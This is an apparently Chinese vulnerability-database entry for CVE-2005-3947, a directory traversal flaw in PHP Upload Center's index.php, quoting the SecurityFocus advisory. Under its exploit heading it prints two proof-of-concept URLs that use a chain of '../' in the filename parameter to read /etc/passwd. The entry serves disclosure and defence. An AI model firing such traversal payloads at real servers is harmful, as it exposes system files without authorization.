PHP Upload Center Index.PHP 目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1109349 漏洞类型 路径遍历
发布时间 2005-11-29 更新时间 2006-09-22
CVE编号 CVE-2005-3947 CNNVD-ID CNNVD-200512-028
漏洞平台 PHP CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/26646
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200512-028
|漏洞详情
PHPUploadCenter的index.php中存在目录遍历漏洞。远程攻击者可以通过filename参数中的"../"序列读取任意文件。
|漏洞EXP
source: http://www.securityfocus.com/bid/15621/info

PHP Upload Center is prone to a directory traversal vulnerability. This is due to a lack of proper sanitization of user-supplied input.

An attacker can exploit this issue to retrieve arbitrary remote files on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.

http://www.example.com/upload/index.php?action=view&filename=../../../../../../../../../../../../../../../../etc/passwd
http://www.example.com/instaladores/index.php?action=view&filename=../../../../../../../../../../../../../../../../etc/passwd
|参考资料

来源:XF
名称:phpupload-index-directory-traversal(24696)
链接:http://xforce.iss.net/xforce/xfdb/24696
来源:BID
名称:15626
链接:http://www.securityfocus.com/bid/15626
来源:BID
名称:15621
链接:http://www.securityfocus.com/bid/15621
来源:MISC
链接:http://www.blogcu.com/Liz0ziM/126975
来源:MISC
链接:http://liz0.3yr.net/phpuploadcenter.txt